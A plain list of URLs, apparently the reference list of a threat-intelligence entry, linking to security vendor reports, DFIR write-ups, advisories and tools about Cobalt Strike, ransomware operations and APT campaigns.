https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20

https://asec.ahnlab.com/en/47455/

https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/

https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654

https://github.com/Apr4h/CobaltStrikeScan

https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html

https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf

https://twitter.com/RedDrip7/status/1402640362972147717?s=20

https://isc.sans.edu/diary/rss/28752

https://www.youtube.com/watch?v=y65hmcLIWDY

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.telsy.com/download/5972/?uid=d7c082ba55

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups

https://github.com/chronicle/GCTI

https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468

https://twitter.com/Unit42_Intel/status/1461004489234829320

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://www.youtube.com/watch?v=pIXl79IPkLI

https://www.cynet.com/understanding-squirrelwaffle/

https://isc.sans.edu/diary/rss/27618

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

https://cert.gov.ua/article/339662

https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://asec.ahnlab.com/ko/19860/

https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims

https://blog.talosintelligence.com/2021/05/ctir-case-study.html

https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/

https://community.riskiq.com/article/c88cf7e6

https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://rastamouse.me/ntlm-relaying-via-cobalt-strike/

https://www.malware-traffic-analysis.net/2021/09/17/index.html

https://blog.macnica.net/blog/2020/11/dtrack.html

https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/

https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728

https://blogs.blackberry.com/en/2022/01/log4u-shell4me

https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html

https://twitter.com/Cryptolaemus1/status/1407135648528711680

https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/

https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/

https://redcanary.com/blog/gootloader

https://www.lac.co.jp/lacwatch/people/20180521_001638.html

https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/

https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/

https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware

https://paper.seebug.org/1301/

https://unit42.paloaltonetworks.com/cobalt-strike-team-server/

https://asec.ahnlab.com/ko/19640/

https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.mandiant.com/resources/defining-cobalt-strike-components

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://boschko.ca/cobalt-strike-process-injection/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://www.varonis.com/blog/hive-ransomware-analysis

https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/

https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf

https://www.youtube.com/watch?v=XfUTpwZKCDU

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

https://mez0.cc/posts/cobaltstrike-powershell-exec/

https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/

https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/

https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/

https://pylos.co/2018/11/18/cozybear-in-from-the-cold/

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors

https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI

https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://us-cert.cisa.gov/ncas/alerts/aa21-148a

https://www.contextis.com/en/blog/dll-search-order-hijacking

https://embee-research.ghost.io/malware-analysis-decoding-a-simple-hta-loader/

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services

https://thedfirreport.com/2020/10/08/ryuks-return/

https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/

https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/

https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/

https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/

https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/

https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://www.mandiant.com/resources/apt41-us-state-governments

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence-gathering

https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign

https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/

https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf

https://www.youtube.com/watch?v=gfYswA_Ronw

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://vanmieghem.io/blueprint-for-evading-edr-in-2022/

https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://embee-research.ghost.io/unpacking-malware-with-hardware-breakpoints-cobalt-strike/

https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf

http://www.secureworks.com/research/threat-profiles/gold-winter

https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/

https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html

https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e

https://malwarebookreports.com/cryptone-cobalt-strike/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://isc.sans.edu/diary/28636

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://www.youtube.com/watch?v=ysN-MqyIN7M

https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/

https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine

https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://www.mandiant.com/resources/russian-targeting-gov-business

https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/

https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos

https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/

https://twitter.com/MBThreatIntel/status/1412518446013812737

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—​a-ransomware—​and-a-botnet-join-the-part.html

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html

https://twitter.com/swisscom_csirt/status/1354052879158571008

https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/

https://d01a.github.io/syscalls/

https://twitter.com/AltShiftPrtScn/status/1385103712918642688

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists

https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/

https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://cert.gov.ua/article/619229

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection

https://blog.group-ib.com/colunmtk_apt41

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my

https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf

https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://twitter.com/elisalem9/status/1398566939656601606

https://isc.sans.edu/diary/rss/28934

https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://www.mandiant.com/resources/unc2452-merged-into-apt29

https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/

https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://twitter.com/Unit42_Intel/status/1458113934024757256

https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/

https://twitter.com/AltShiftPrtScn/status/1350755169965924352

https://twitter.com/AltShiftPrtScn/status/1403707430765273095

http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware

https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://www.malware-traffic-analysis.net/2021/09/29/index.html

https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book

https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html

https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/

https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/

https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love

https://www.mandiant.com/resources/sabbath-ransomware-affiliate

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1

https://x.com/embee_research/status/1736758775326146778

https://connormcgarr.github.io/thread-hijacking/

https://www.brighttalk.com/webcast/7451/462719

https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c

https://www.arashparsa.com/hook-heaps-and-live-free/

https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2

https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/

https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/

https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/

https://labs.k7computing.com/index.php/cobalt-strikes-deployment-with-hardware-breakpoint-for-amsi-bypass/

https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one

https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure

https://isc.sans.edu/diary/rss/28448

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/

https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html

https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir

https://www.arashparsa.com/catching-a-malware-with-no-name/

https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a

https://explore.group-ib.com/htct/hi-tech_crime_2018

https://isc.sans.edu/diary/rss/28664

https://blog.zsec.uk/cobalt-strike-profiles/

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/

https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/

https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought

https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://redcanary.com/blog/getsystem-offsec/

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes

https://www.netresec.com/?page=Blog&month=2024-01&post=Hunting-for-Cobalt-Strike-in-PCAP

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf

https://isc.sans.edu/diary/rss/26862

https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/

https://intel471.com/blog/shipping-companies-ransomware-credentials

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a

